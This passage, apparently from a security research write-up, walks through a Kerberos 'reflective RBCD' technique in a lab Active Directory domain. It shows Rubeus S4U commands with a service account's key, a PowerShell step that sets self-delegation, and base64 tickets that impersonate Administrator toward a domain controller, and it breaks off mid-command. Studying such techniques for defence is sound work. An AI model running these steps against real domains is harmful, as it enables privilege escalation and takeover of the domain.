Since the protocol transition uses S4U2Self to get a valid service ticket for ourselves and uses it as "evidence" for S4U2Proxy, our first thought might be to forge this ticket on our own. Because we compromised TestSvc, we know its secret, so forging this service ticket should be possible in theory.

And yet we fail to forge a ticket for an arbitrary user and pass it to S4U2Proxy.

The first step consists in forging the service ticket to use as evidence (040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 is the aes256 key of the TestSvc service account, MSSQLSvc/whatever.alsid.corp is the SPN requested, held by TestSvc itself):

.\Rubeus.exe silver /service:MSSQLSvc/whatever.alsid.corp /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /user:alsid.corp\Administrator /ldap /domain:alsid.corp /flags:forwardable /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.1.1

[*] Action: Build TGS
...
[*] Building PAC
...
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'MSSQLSvc/whatever.alsid.corp'
...
[*] base64(ticket.kirbi):
doIFczCCBW+gAwIBBaEDAgEWooIEWTCCBFVhggRRMIIETaADAgEFoQwbCkFMU0lELkNPUlCiKjAooAMCAQKhITAfGwhNU1NRTFN2YxsTd2hhdGV2ZXIuYWxzaWQuY29ycKOCBAowggQGoAMCARKhAwIBA6KCA/gEggP0Jl2zxQ1VVoWL2iPIENC0NHefQx1D+wUsczCQLL3CrHqjpq16D/n0YFf5uqrLPuC6oIphRbbIRCmVO8cN2h8X9/ZFNBdqJmW9k8OrByGlpwWQ51hg3WgVp24zJuqX3YTHZxQ5H1n6+8KkaqH9rUrz+WK52vdihN6xbHdX0U2zkb6iE4YfvZk9KX9daDqlRhE5P6i/D+oxda4A5BrLXOvBxMDY0E6PPNfkwLXfsc0MWo9/ZutfdGC4t1onKELY2WZ27/iyR0Ng/D9LQ7mCyPAjFkTR2nS1vUJz3Ae4omIKaaOBbN+e/X6cyTjBCLWUzecX2Xy+2wu1x4BP62mrQ9T73IByeeavC+3z2Lygig5Fx18UvJbPP9E3gFBF9/3PJK0rOMqFKbojAEDF+XLVMfE+T8/rNNMB6VH5ReoQbG+OuUEaAlcBPoWlAxrcPznE3kRkbB1KqiJHGMiMgQqVIGJt9zZxblcY+mHC3Pbw1v7G+t9YnF2dalbdicC+eWSoQydbv10spX5h89BQ/PgVL0vTGnFs9fzYT6NibIJcot3MgBnruGVK7OhK8w9Bv56aZ6NQXkj+ttGK6NrS0T3B8lnX23PRJqiu5eQ4NIR2w618LkOJSLcqM99EKQmfqhUJwsqLWDf3Q/IMBHXOtgKi7ZtvruCO12qJbdOYh+K1nLfnlwq/qNNs9HQtAqCgWlpoOb4tpfRI/A12a3hCgVSd0kPbsqHpBtfh8d0yJGsl8SJiMfMJB5hdJO4uXiP+9AEQrGAx7yUQ9bKmEVlSXXYC/LT2Posi/254uZEX3C6W0UGoAVqB0a9GPGnu32pt5ulagp9i/5c4OnmSLqXRXrmb4rlEETl/f5bOpegVdknk20Mg17jyhPDbxNNfMOfYPXd0k+WPbMBFK9Lol6GEPY1n6CLp5c4TaG6XZk3A+mYmvHEazxZjfKC1PR+GmnF7AJPkVbLSvh23YpMphjf6g5Fu/ohbshTL7tUB13uEMgH1EpWXvdG349r9t+Nosw9iGRxbKIwyRnZMOK16DHu70ETNjt4gRNf2KLwSsfYB2dg6crKvH1deWeFDH5OgpNGlAroSTIbW+swyrquK20lYDTkMYIPdaKTQqwUA19ol3X8PWJDgdKJfO264q9y3phJufUkqYSzifMueTvGup9IxqQnt6CsW1RBqYTFkYddQ2uTi40hmaJVeKYw/WPOAv38AYbwwl4OVptxsRyq2Ts07LRWYFJfvc6Ol9hK2TAR4S9C+splESMHYLatpbTFj58OWp6AVw/SwKuSvU5JEh3B5WIMkdWPouD8MrsTKJ5T1JU5J1a72k4l3h8TCi/tRp42DudvDhAxDEGg5m6OCAQQwggEAoAMCAQCigfgEgfV9gfIwge+ggewwgekwgeagKzApoAMCARKhIgQgdPMmPJpSNbnt8crSu95aBGTGbz32W45+wH3zl9OIr9ihDBsKQUxTSUQuQ09SUKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEAAAACkERgPMjAyMjExMDIwOTMwMDBapREYDzIwMjIxMTAyMDkzMDAwWqYRGA8yMDIyMTEwMjE5MzAwMFqnERgPMjAyMjExMDkwOTMwMDBaqAwbCkFMU0lELkNPUlCpKjAooAMCAQKhITAfGwhNU1NRTFN2YxsTd2hhdGV2ZXIuYWxzaWQuY29ycA==

Next, we use this evidence for the S4U2Proxy request:

.\Rubeus.exe s4u /user:TestSvc /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /msdsspn:HOST/DC01.ALSID.CORP /altservice:CIFS /tgs:<previously_forged_b64_service_ticket>
...
[*] Action: S4U

[*] Loaded a TGS for ALSID.CORP\Administrator
[*] Impersonating user 'Administrator' to target SPN 'HOST/DC01.ALSID.CORP'
[*] Final ticket will be for the alternate service 'CIFS'
[*] Building S4U2proxy request for service: 'HOST/DC01.ALSID.CORP'
[*] Using domain controller: DC01.alsid.corp (192.168.199.2)
[*] Sending S4U2proxy request to domain controller 192.168.199.2:88

[X] KRB-ERROR (41) : KRB_AP_ERR_MODIFIED

The S4U2Proxy rejected our forged service ticket with the error KRB_AP_ERR_MODIFIED due to a PAC (Privilege Attribute Certificate) validation issue, as seen below:

KRB_AP_ERR_MODIFIED error in Wireshark

By the way, if you're looking for information on decrypting encrypted stub data in Kerberos exchanges, check out Decrypt Kerberos/NTLM "encrypted stub data" in Wireshark by Clément Notin [Tenable].

According to Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory:

The problem with silver tickets is that, when forged, they do not have a PAC with a valid KDC signature. If the target host is configured to validate KDC PAC Signature, the silver ticket will not work. There may also be other security solutions that can detect silver ticket usage.
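The trust relationship can be illustrated with plain HMACs: the PAC carries a server checksum keyed with the service key (which we hold after compromising TestSvc) and a KDC checksum keyed with the krbtgt key (which we do not). This is a conceptual sketch only, with toy keys and HMAC-SHA256 standing in for the real PAC checksum algorithms:

```python
import hmac, hashlib

# Conceptual sketch: why a forged silver ticket fails KDC-side PAC validation
# during S4U2proxy. The real PAC uses KERB_CHECKSUM signatures (e.g.
# HMAC-SHA1-96-AES256); plain HMAC-SHA256 here only shows the key asymmetry.

service_key = b"service-account-key"  # known to the attacker (TestSvc compromised)
krbtgt_key = b"krbtgt-secret-key"     # known only to the KDC

pac = b"user=Administrator;groups=512"

# The attacker can forge a correct server signature, but must guess the KDC one.
server_sig = hmac.new(service_key, pac, hashlib.sha256).digest()
forged_kdc_sig = hmac.new(b"wrong-guess", pac, hashlib.sha256).digest()

# KDC-side check when the forged ticket comes back as evidence:
expected = hmac.new(krbtgt_key, pac, hashlib.sha256).digest()
print(hmac.compare_digest(forged_kdc_sig, expected))  # False -> KRB_AP_ERR_MODIFIED
```

The forged server signature verifies fine, which is why silver tickets work against the service itself; it is the KDC signature check in S4U2Proxy that kills the forgery above.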

In fact, before CVE-2020-17049 (Kerberos Bronze Bit Attack), an attacker who owned a service account was able to forge the missing FORWARDABLE flag of a service ticket and pass it successfully to the S4U2Proxy protocol extension.

Also, according to CVE-2020–17049: Kerberos Bronze Bit Attack — Theory:

Later when the KDC receives the service ticket during the S4U2proxy exchange, the KDC can validate all three signatures to confirm that the PAC and the service ticket have not been modified. If the service ticket is modified (for example, if the forwardable bit has changed), the KDC will detect the change and reject the request with an error such as “KRB_AP_ERR_MODIFIED(Message stream modified).”

Note that, since KB4598347 (CVE-2020-17049), the KDC no longer checks the forwardable flag, as we will see.

Reflective RBCD

If we control TestSvc, it means that we can set the RBCD (Resource-based Constrained Delegation) on this object since we have full control over it.

RBCD only requires permission to write an attribute (msDS-AllowedToActOnBehalfOfOtherIdentity) on the target, whereas setting msDS-AllowedToDelegateTo (classic constrained delegation) requires domain administrator privileges. More precisely, setting the msDS-AllowedToDelegateTo attribute requires the SeEnableDelegationPrivilege privilege, which is granted to the "Domain Local" group Administrators (see the security policies in the Default Domain Controllers Policy).

Note that setting the protocol transition (the TRUSTED_TO_AUTH_FOR_DELEGATION UAC flag) also requires domain administrator privileges.

Setting self RBCD:

PS J:\> whoami
alsid\TestSvc
PS J:\> Get-ADUser TestSvc -Properties msDS-AllowedToDelegateTo,servicePrincipalName,PrincipalsAllowedToDelegateToAccount,TrustedToAuthForDelegation

msDS-AllowedToDelegateTo : {HOST/DC01.ALSID.CORP}
servicePrincipalName : {MSSQLSvc/whatever.alsid.corp}
PrincipalsAllowedToDelegateToAccount : {}
TrustedToAuthForDelegation : False

PS J:\> Set-ADUser TestSvc -PrincipalsAllowedToDelegateToAccount TestSvc
PS J:\> Get-ADUser TestSvc -Properties PrincipalsAllowedToDelegateToAccount

PrincipalsAllowedToDelegateToAccount : {CN=TestSvc,CN=Users,DC=alsid,DC=corp}

Without the protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION), S4U2Self cannot provide valid "evidence" (i.e. a service ticket) to S4U2Proxy. The trick, then, is to replace the S4U2Self used for the protocol transition with a reflective RBCD, i.e. to execute an RBCD attack on ourselves.

But this time, because Resource-Based Constrained Delegation performs a successful delegation (*), an attacker can generate a valid service ticket impersonating an arbitrary user; in other words, we have somehow reproduced the protocol transition.

(*) The KDC only checks that the delegated user is OK to be delegated (i.e. neither a member of Protected Users nor flagged as sensitive) and that the delegating account is set as a trustee in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
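Those KDC-side checks can be sketched as a small predicate (the 0x100000 value is the documented UF_NOT_DELEGATED / "account is sensitive and cannot be delegated" flag; the function itself is hypothetical):

```python
# Sketch of the RBCD check described above: the KDC verifies that the
# delegated user may be delegated at all, and that the delegating account
# is a trustee in msDS-AllowedToActOnBehalfOfOtherIdentity.

UF_NOT_DELEGATED = 0x100000  # userAccountControl: "sensitive, cannot be delegated"

def rbcd_delegation_allowed(user_uac: int, user_in_protected_users: bool,
                            delegator: str, trustees: set) -> bool:
    if user_in_protected_users:
        return False
    if user_uac & UF_NOT_DELEGATED:
        return False
    return delegator in trustees

# Administrator (plain UAC flags), not protected, TestSvc set as trustee on itself:
print(rbcd_delegation_allowed(0x200, False, "TestSvc", {"TestSvc"}))  # True
```

Nothing in this path validates how the evidence ticket was obtained, which is exactly what the reflective trick exploits.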

Note: The msDS-AllowedToActOnBehalfOfOtherIdentity attribute used to configure RBCD is a security descriptor:

PS J:\> $account = Get-ADUser TestSvc -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
PS J:\> ConvertFrom-SddlString -Sddl $account."msDS-AllowedToActOnBehalfOfOtherIdentity".Sddl
Owner            : BUILTIN\Administrators
Group :
DiscretionaryAcl : {ALSID\TestSvc: AccessAllowed (ChangePermissions, CreateDirectories, Delete, DeleteSubdirectoriesAndFiles, ExecuteKey, FullControl, GenericAll, GenericExecute, GenericRead, GenericWrite, ListDirectory, Modify, Read, ReadAndExecute, ReadAttributes, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, Write, WriteAttributes, WriteData, WriteExtendedAttributes, WriteKey)}
SystemAcl : {}
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
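When tooling writes this descriptor from scratch, it is commonly expressed in SDDL with a single full-control ACE granted to the delegating account's SID, matching the GenericAll grant visible in the dump above. A minimal sketch, assuming a placeholder SID for TestSvc:

```python
# Sketch: build the SDDL commonly used for
# msDS-AllowedToActOnBehalfOfOtherIdentity, granting a full-control ACE
# to one trustee SID. The SID below is a placeholder, not a real account.

def rbcd_sddl(trustee_sid: str) -> str:
    # O:BA -> owner BUILTIN\Administrators (as in the dump above)
    # (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SID) -> one access-allowed ACE
    return f"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{trustee_sid})"

print(rbcd_sddl("S-1-5-21-111111111-222222222-333333333-1104"))
```

The SDDL string is then converted to a binary security descriptor before being written to the attribute.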

Finally, we have (S4U2Self + S4U2Proxy) + extra S4U2Proxy, where (S4U2Self + S4U2Proxy) is the reflective RBCD.

Mimicking Kerberos protocol transition

Here are the detailed steps:

  • S4U2Self without TRUSTED_TO_AUTH_FOR_DELEGATION;

The service ticket is for an arbitrary user and it is not forwardable. With regard to RBCD, this is not an issue, because a non-forwardable ticket will still be accepted by S4U2Proxy: since KB4598347, the KDC no longer checks the forwardable flag, to avoid blindly trusting the PAC in case of PAC forgery. Moreover, in the case of Resource-Based Constrained Delegation, the KDC only checks whether the delegated user is OK to be delegated (i.e. not in Protected Users, not NOT_DELEGATED) and whether the delegating resource (TestSvc) is set as a trustee in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

  • S4U2Proxy;

We get a forwardable service ticket for ourselves (see setting self RBCD above) to use as evidence for the next S4U2Proxy.

  • S4U2Proxy (again);

We just tricked our way into getting a valid evidence. Now we can request a service ticket this time for a service running under the privileged object set in msDS-AllowedToDelegateTo (classic constrained delegation).

In practice, we have:

J:\>klist

Current LogonId is 0x1:0x7a919ebc

Cached Tickets: (1)

#0> Client: TestSvc @ ALSID.CORP
Server: krbtgt/ALSID.CORP @ ALSID.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 7/8/2022 11:54:43 (local)
End Time: 7/8/2022 21:54:43 (local)
Renew Time: 7/15/2022 11:54:43 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DC01

J:\>dir \\DC01.ALSID.CORP\C$
Access is denied.

J:\>.\Rubeus.exe s4u /user:TestSvc /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /domain:alsid.corp /msdsspn:MSSQLSvc/whatever.alsid.corp /impersonateuser:Administrator /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.1.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605
[*] Building AS-REQ (w/ preauth) for: 'alsid.corp\TestSvc'
[*] Using domain controller: 192.168.199.2:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFBjCCBQKgAwIBBaEDAgEWooIEETCCBA1hggQJMIIEBaADAgEFoQwbCkFMU0lELkNPUlCiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmFsc2lkLmNvcnCjggPNMIIDyaADAgESoQMCAQKiggO7BIIDtziDJUKhpiQpBW+Oy/6eKHq02Vu45cBGNu2TK3FfRPvL4yLgXup/afyy9YR9KLmJ0FaBM4Y5r69LKhYvISsWO7uqjtL3dzI+PcbpvRWzNgqtGyeQ9OVf5nrdVphQOE8X2PnxZ9Dbpg087c2wsiZaK1P9PYkLl3hQlA0aw29PobVC+WmjPo7nALWjMdHvPEILNBAGRsstIdAfB5zzAQQehxDs1E8XNf6S3xsNBk1n11BWSgc9FJixwebBFIt18ZnsPFAH/fIac9sWaY2NBhBRUSdmU8OtGqb3X527sy6hMfyNkTQeT3MEF72jiH/CqBJNDQ09yvETAwRX5p8VgExjhSqFbtl6HzQYxySXGyXxwpGdSNBm2/w2XOJjhEiQwqVm0mabCEfPrUBpOEBN2OI2vus1U855o6TnXKuYExy6f6A9/JWR1q/RdA9f6PCM9oIoCZbPjdeCVh56N3j6WIZbSRorVzlXXKoxcOhtEC4ROqY9kRs1NpA+OHV5aD1k2ED6cfNDHe1zUKKdikSH2NKXk0Mr9lkzW59v4VKqnnKBYoI6t1Xn4lelYuDsoFchj+RbS/+jnwCAA0uRl8QOGYr0/uHCpSGllE1YnfKfJJKnhs2WvdsZmesgN61xGzMolFMZrR0oIJtAnz5P6QMwp6vMtymSJJCmIQ3j7s0blDggXxITB9iNDHLzVXCa9FP+DaMJDG8bgQt+UxMRNrQ/fIZZLz/GVV+tExnohpi+KjgYqA1G1MotMz5TFvJ2tsodmZx2sSRgbeZ+RqwGFRBeU/QBcLd80aTGCwO/EsL8aFo10UXGU8K68PUFi81F9d3H0dNxP3oaXhPGcE7dc1DCb9xlUXALubBbqsZ3fTm4T11fgiFzBILRatCl4XM3MDX6UfWgpwAAVAqPr3oh0c/ZLSp/HYJAVH+RM2GZ3GJ0QMocToQnCVUvHRmV39XBLgQd5jX3Tod8vrl209cjtjteDRK/8gw5+qhZ5kFcdlHRmS5s35Iz/z5Yo6HcyPi89TdHT8fP2zp8d+1GwE/L0gGWwnZmjEDwJWE3ImybxSIVbctFqWZ1MAQyMZh9wEpLYF5z8MdK6vcw9Uwnt3AL/zIyZrY9usoW3IEqfI0mCVVXTSzab2LZDpSzbYumyyLNaCKfK5k8EOQJ62fmwGaywDBBS19oCwhXPP7809ewjBGCb8jTBCIcoRI4lg45/u9bw97nTewHisiX5nj9TTDrdaLEa2AyilwYrLN9lC8H4i+hQXgwwI1R6PccY1EZ4KOB4DCB3aADAgEAooHVBIHSfYHPMIHMoIHJMIHGMIHDoCswKaADAgESoSIEIFx7HgoNGnCa2ZGy4BdsnKiURRsgFfN8HnNgP6r2jIAzoQwbCkFMU0lELkNPUlCiFTAToAMCAQGhDDAKGwh0ZXN0dXNlcqMHAwUAQOEAAKURGA8yMDIyMDcwODA5MjQyMlqmERgPMjAyMjA3MDgxOTI0MjJapxEYDzIwMjIwNzE1MDkyNDIyWqgMGwpBTFNJRC5DT1JQqR8wHaADAgECoRYwFBsGa3JidGd0GwphbHNpZC5jb3Jw


[*] Action: S4U

[*] Building S4U2self request for: 'testuser@alsid.corp'
[*] Using domain controller: DC01.alsid.corp (192.168.199.2)
[*] Sending S4U2self request to 192.168.199.2:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'testuser@alsid.corp'
[*] base64(ticket.kirbi):

doIFWDCCBVSgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoQwbCkFMU0lELkNPUlCiFTAToAMCAQGhDDAKGwh0ZXN0dXNlcqOCBD4wggQ6oAMCARehAwIBBKKCBCwEggQodMExQsqVhou6aOvYkN1JZZv5bH8FfDUpTPySOqJhiSE9GegSXH1Lu5aTP4i7YLgdMg5WyUNECHrNxH80Gg+9on/4T265SVCivmgfSCkraQVMQ+2+ckDV4umf1ms4HXNCDRLmeapHWRAiapGYx4jMBAedZ7L3Jnw9TWCIF+ZbJ+QblfapXfhKPj9rJFI53mLYbrP9CPd1qGXd+FFQYRjOsigjNSfd7PqNc/GRS4slrumS8QjQjhldmUNVDi0TQvYupxY1oxiMqk7AAG83zbMSR/5Zq8XDR0yHNv5ZiHIfuVDL/AIEARrKKrRLSfllXyLjEtk5kRtukoIfSPhvyweVIruZn9puOr5+uSJxn7lxcfgLrT7MzE9BT/HDRHJeYholtDykG0tg1pfiKtXj/rekTKaPuuleNnrvoiDH/57SpHa42AXbnf9bSBqZcknnCz6n4Dk6MmWHr7pR//dVUl1ewlKBMb/WO90cEbyuqoDglOKf6yUzUlPxYBiVLjb+3hg+doZj/5pzm/2wLWUuN4IfpJ2kC3FgBRVKo1varXchSMTwuFMK1JWDJ+ZSKToFNa+5GDVcGy4mXG/a8gk1Q/QQt32+L6pGLwN3bItVIVjZzAQUlkJdoKYlv6rjHRdR3t1Z2bV3ol2jCkWcVKT3c6nLnBsUYUU3RfQenlCFT7/fNXVO2DUxBL6ugpiomvuywOTjvVFph+PMm9hZJMeCVVOqhvBoR3+4GzLAZJ4jvTjNTsQoV/as5mDxi+5/LHok1j64HbSVtn+FPzOymN+r4pKl/6E4JonCQxAN6Nv4RafhNvle3uFa2pNbr5X89MKJAxMAGgPTzoDsVLoS0iG6MvgjKHO3m6/G0fiFbuDLRFomq3ZON2gsnYd+X5RDrxuo0sZgmA6DJWB1v5hG4gJbcdan2G06aUMtx6zvVtc71Ke/+HAFqH274lPDF4uumESnFk7+PvHAy6akaLmCMSjAV6ufBwx/5zxlAd5fRblFylFqD2yyie+AauVjV8QIpHLvgK6RucTGwHQoBBZrdL9meLnsmaRdKMC5bX1Wb3Eek1de/nuOEt1rnVUFMG3WAgVLybv9SEsgRkgrWf4SzMysgXuf+/Jh52EKisHx8u08VfLKrShS5ApeETAMhu9BNgGYlj7fy77d1v7pWJGl40ICbslOsSQORCQXJKgDI9bms3XYfkL5wmchKFUVq2a8EUapL2VrQIcMYwyIFOuI8X6/LllsDDaX7GCPndOWTMO/0Ly+TGPM869nUI8ZyCQKiNPSlIrwkiMQs6HZC+JVvyw+e+lX0VQh6lay0GwNecOWdEXYA3ms9vdTR6uNSLDScvvzS4ywhVYkdKQm54W/+z0AeGd9DcURr4tjhPVi7A3Des5hcQ5Zhtim3u6ThPeDGlSroz0jvRdaUzYXtWWjgcswgcigAwIBAKKBwASBvX2BujCBt6CBtDCBsTCBrqAbMBmgAwIBF6ESBBC9HOonFiJahrI/emtNO+odoQwbCkFMU0lELkNPUlCiGjAYoAMCAQqhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBAoQAApREYDzIwMjIwNzA4MDkyNDIyWqYRGA8yMDIyMDcwODE5MjQyMlqnERgPMjAyMjA3MTUwOTI0MjJaqAwbCkFMU0lELkNPUlCpFTAToAMCAQGhDDAKGwh0ZXN0dXNlcg==

[*] Impersonating user 'Administrator' to target SPN 'MSSQLSvc/whatever.alsid.corp'
[*] Building S4U2proxy request for service: 'MSSQLSvc/whatever.alsid.corp'
[*] Using domain controller: DC01.alsid.corp (192.168.199.2)
[*] Sending S4U2proxy request to domain controller 192.168.199.2:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'MSSQLSvc/whatever.alsid.corp':

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

First, we performed S4U2Self and S4U2Proxy. Now let’s ask for a service ticket for the domain controller. (Note: if you want to avoid a new AS-REQ, you can pass the TestSvc TGT with the /ticket switch.) The service ticket passed as an argument (/tgs) is the result of the final S4U2Proxy above:
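The chaining described above can be sketched conceptually. This is a toy model of the exchanges, not real Kerberos; the point is only to show how each response ticket is fed as evidence into the next request, which is what Rubeus does with the /ticket and /tgs switches. Names mirror the lab output.

```python
# Toy model of the reflective RBCD chain (not real Kerberos).

def s4u2self(service_account, impersonated_user):
    # The service asks the KDC for a ticket to itself on behalf of the user.
    return {"client": impersonated_user, "sname": service_account, "forwardable": True}

def s4u2proxy(service_account, evidence_tgs, target_spn):
    # The evidence ticket "proves" the user authenticated to the service;
    # the KDC validates the (reflective) RBCD rule before issuing the TGS.
    return {"client": evidence_tgs["client"], "sname": target_spn}

# Stage 1: reflective RBCD on TestSvc itself.
self_tgs = s4u2self("TestSvc", "Administrator")
proxy_tgs = s4u2proxy("TestSvc", self_tgs, "MSSQLSvc/whatever.alsid.corp")

# Stage 2: reuse the previous S4U2Proxy result (/tgs) as evidence to reach the DC.
dc_tgs = s4u2proxy("TestSvc", proxy_tgs, "HOST/DC01.ALSID.CORP")
assert dc_tgs["client"] == "Administrator"
```

The impersonated identity survives both hops: the client field of the final ticket is still Administrator, while the sname now points at the domain controller.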

J:\>.\Rubeus.exe s4u /user:TestSvc /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /msdsspn:HOST/DC01.ALSID.CORP /altservice:CIFS /ptt /nowrap /tgs:doIGOjCCBjagAwIBBaEDAgEWooIFRTCCBUFhggU9MIIFOaADAgEFoQwbCkFMU0lELkNPUlCiKjAooAMCAQKhITAfGwhNU1NRTFN2YxsTd2hhdGV2ZXIuYWxzaWQuY29ycKOCBPYwggTyoAMCARehAwIBBKKCBOQEggTgq5NVdJI8wTAxBUkYmiIsUNKI/BSYL/NWJN5nTG6A6WvdLJ8DcOHpVfeKXErzXgjt5frKOi8Jx20/LhJBrrQGSoD7iBsHYeRa8Y3u1YynZWVp8iwFJayL5LOHmWnruONVvgiZr5uzaykQI5TBP/9zyz5qRXeDdrLqS2pNKW5ANrg+bZ+Zdmh3HXrfRjeMUTIc0u8L0GPtfCQFlWtOhUKZ0SOaWDI3ASb2Ji3cDcjf2fHSqmw8+9/GTaGokDOV81iVK6mIB0z81jBMTqjk0V0s1P2U8hdn1lb/H6zINe+mm65uQUMVEExTTFncDjn6fmVm5bJU/kDnImDwhv/SNcj9vxmt82FnuKh+KrBb5JFdWqGeEw9IQWn67kV69Xt+yRtTFTctk5PM/vaBdOpOsoGG76kZ3pxmLZvM5w4iuP5zvkA9YF9VEpDFSqtcYQ8jwFSNTuNI2gfISojdBnRLqXsgqYOlGqtONAZBcwNT4SxOkFuwg6tATuxP8Kpl5YNzkazP7Nk05fg59DF+cV/5d1yvrZRAtHK0ewCwYVLYSni4pQXJj1UxD6UKJKmGzLdM8DgZ26/21XTngZe8Bpigme4mCTfO13ZsYivmxeZCZr3TS9hz1aqsEa5i+88MIivmXKYtQiEEBogYjGDzefNcZRxlFzFq/hRXkxZcyINyBmonSwKT8H4g7fogrJubUWlZB9paAicuOv6kCtNCCNCxGTzIhPkoYZ89XLHRaDbCnNBFX6siTidqJfbjejRifX2xnt37WVsFhivi16DhTb9hOrP+1Eus6ZtpTGlqX7TxZa9j57C8HRXaCfMQs3M+EwjaUf0yS/aXdjxpIxXIqy313ZhyKiHJGejctGHUoP5u7oroHwnWzT3sslygzVM+NRUV7eydIg4RDauwSkFNCHIFemHNUoDjVrQjrSLWaQyemadEagcEN0cQ8RrnPJ/2K8rtJm/QaH7C